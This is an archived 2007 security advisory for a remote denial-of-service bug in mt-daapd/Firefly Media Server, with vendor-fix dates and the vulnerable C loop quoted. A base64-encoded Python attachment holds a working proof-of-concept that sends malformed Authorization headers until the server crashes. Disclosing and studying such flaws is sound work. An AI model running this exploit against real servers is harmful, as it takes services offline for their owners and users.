AOH :: HP Unsorted F :: TB13264.HTM

Firefly Media Server DoS



Firefly Media Server DoS
Firefly Media Server DoS



------=_Part_3565_5201906.1194026270314
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[UPH-07-02]
UnprotectedHex.com security advisory [07-02]
Discovered by nnp

Discovered : 1 August 2007
Reported to the vendor : 13 October 2007
Fixed by vendor : 21 October 2007

Vulnerability class : Remote DoS

Affected product : mt-dappd/Firefly Media Server
Version : <= 0.2.4

Product details:
www.fireflymediaserver.org/ 
'''
The purpose of this project is built the best server software to serve
digital music to the Roku Soundbridge and iTunes; to be able to serve
the widest variety of digital music content over the widest range of
devices
'''

File/Function/line : webserver.c/ws_decodepassword/1399

Cause: Null pointer dereference. There is an unchecked increment of
the 'header' variable until a space character is encountered. If a
space character is not encountered the pointer is
incremented/dereferenced until out of bounds memory is hit. Exploiting
this depends on the state of memory at the time so the exploit
constantly sends a header with no data as part of the authorization
header until a crash occurs. This typically occurs within seconds.



    /* xlat table is initialized */
    while(*header != ' ')
    header++;

Proof of concept code : Yes


- --
http://www.smashthestack.org 
http://www.unprotectedhex.com 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)
Comment: http://firegpg.tuxfamily.org 

iD8DBQFHK8ZtbP10WPHfgnQRAmoEAJ9/4/wA4JFgjNta3Y0ScFL2KP5UEQCfbG03
NdzP+J8eSx+Q08/hX/ZzCSY=Ga2w
-----END PGP SIGNATURE-----

------=_Part_3565_5201906.1194026270314
Content-Type: application/octet-stream; name=uph0702.py
Content-Transfer-Encoding: base64
X-Attachment-Id: f_f8jf72ny
Content-Disposition: attachment; filename=uph0702.py

IyFDOlxweXRob24yNVxweXRob24yNS5leGUNCg0KIiIiCkFkdmlzb3J5IDogW1VQSC0wNy0wMl0N
Cm10LWRhcHBkL0ZpcmVmbHkgbWVkaWEgc2VydmVyIHJlbW90ZSBEb1MKRGlzY292ZXJlZCBieSBu
bnAKaHR0cDovL3d3dy51bnByb3RlY3RlZGhleC5jb20NCiIiIg0KDQppbXBvcnQgc3lzDQppbXBv
cnQgc29ja2V0DQppbXBvcnQgdGltZQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogICAgc3lz
LmV4aXQoLTEpDQoNCmtpbGxfbXNnID0gIiIiR0VUIC94bWwtcnBjP21ldGhvZD1zdGF0cyBIVFRQ
LzEuMVxyXG4gDQpBdXRob3JpemF0aW9uOlxyXG5cclxuIiIiDQoNCmhvc3QgPSBzeXMuYXJndlsx
XQ0KcG9ydCA9IHN5cy5hcmd2WzJdDQoNCnByaW50ICdbK10gSG9zdCA6ICcgKyBob3N0DQpwcmlu
dCAnWytdIFBvcnQgOiAnICsgcG9ydA0KDQpwcmludCAiWytdIFNlbmRpbmcgIg0KcHJpbnQga2ls
bF9tc2cNCg0KY3RyID0gMQ0Kd2hpbGUgMToNCiAgICBwcmludCAnWytdIEN0ciA6ICcgKyBzdHIo
Y3RyKQ0KICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19T
VFJFQU0pDQogICAgcy5jb25uZWN0KChob3N0LCBpbnQocG9ydCkpKQ0KICAgIHMuc2VuZChraWxs
X21zZykNCiAgICBzLmNsb3NlKCkNCiAgICBjdHIgKz0gMQ0KDQoNCg=------=_Part_3565_5201906.1194026270314
Content-Type: text/plain; name=uph0702.txt
Content-Transfer-Encoding: base64
X-Attachment-Id: f_f8jf7dl5
Content-Disposition: attachment; filename=uph0702.txt

W1VQSC0wNy0wMl0KVW5wcm90ZWN0ZWRIZXguY29tIHNlY3VyaXR5IGFkdmlzb3J5IFswNy0wMl0K
RGlzY292ZXJlZCBieSBubnAKCkRpc2NvdmVyZWQgOiAxIEF1Z3VzdCAyMDA3ClJlcG9ydGVkIHRv
IHRoZSB2ZW5kb3IgOiAxMyBPY3RvYmVyIDIwMDcKRml4ZWQgYnkgdmVuZG9yIDogMjEgT2N0b2Jl
ciAyMDA3CgpWdWxuZXJhYmlsaXR5IGNsYXNzIDogUmVtb3RlIERvUwoKQWZmZWN0ZWQgcHJvZHVj
dCA6IG10LWRhcHBkL0ZpcmVmbHkgTWVkaWEgU2VydmVyClZlcnNpb24gOiA8PSAwLjIuNA0KUHJv
ZHVjdCBkZXRhaWxzOiAKd3d3LmZpcmVmbHltZWRpYXNlcnZlci5vcmcvIAonJycKVGhlIHB1cnBv
c2Ugb2YgdGhpcyBwcm9qZWN0IGlzIGJ1aWx0IHRoZSBiZXN0IHNlcnZlciBzb2Z0d2FyZSB0byBz
ZXJ2ZSBkaWdpdGFsIG11c2ljIHRvIHRoZSBSb2t1IFNvdW5kYnJpZGdlIGFuZCBpVHVuZXM7IHRv
IGJlIGFibGUgdG8gc2VydmUgdGhlIHdpZGVzdCB2YXJpZXR5IG9mIGRpZ2l0YWwgbXVzaWMgY29u
dGVudCBvdmVyIHRoZSB3aWRlc3QgcmFuZ2Ugb2YgZGV2aWNlcwonJycNCg0KRmlsZS9GdW5jdGlv
bi9saW5lIDogd2Vic2VydmVyLmMvd3NfZGVjb2RlcGFzc3dvcmQvMTM5OQ0KDQpDYXVzZTogTnVs
bCBwb2ludGVyIGRlcmVmZXJlbmNlLiBUaGVyZSBpcyBhbiB1bmNoZWNrZWQgaW5jcmVtZW50IG9m
IHRoZSAnaGVhZGVyJyB2YXJpYWJsZSB1bnRpbCBhIHNwYWNlIGNoYXJhY3RlciBpcyBlbmNvdW50
ZXJlZC4gSWYgYSBzcGFjZSBjaGFyYWN0ZXIgaXMgbm90IGVuY291bnRlcmVkIHRoZSBwb2ludGVy
IGlzIGluY3JlbWVudGVkL2RlcmVmZXJlbmNlZCB1bnRpbCBvdXQgb2YgYm91bmRzIG1lbW9yeSBp
cyBoaXQuIEV4cGxvaXRpbmcgdGhpcyBkZXBlbmRzIG9uIHRoZSBzdGF0ZSBvZiBtZW1vcnkgYXQg
dGhlIHRpbWUgc28gdGhlIGV4cGxvaXQgY29uc3RhbnRseSBzZW5kcyBhIGhlYWRlciB3aXRoIG5v
IGRhdGEgYXMgcGFydCBvZiB0aGUgYXV0aG9yaXphdGlvbiBoZWFkZXIgdW50aWwgYSBjcmFzaCBv
Y2N1cnMuIFRoaXMgdHlwaWNhbGx5IG9jY3VycyB3aXRoaW4gc2Vjb25kcy4NCg0KICAgIC8qIHhs
YXQgdGFibGUgaXMgaW5pdGlhbGl6ZWQgKi8KICAgIHdoaWxlKCpoZWFkZXIgIT0gJyAnKQogICAg
aGVhZGVyKys7CgpQcm9vZiBvZiBjb25jZXB0IGNvZGUgOiBZZXMK
------=_Part_3565_5201906.1194026270314--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.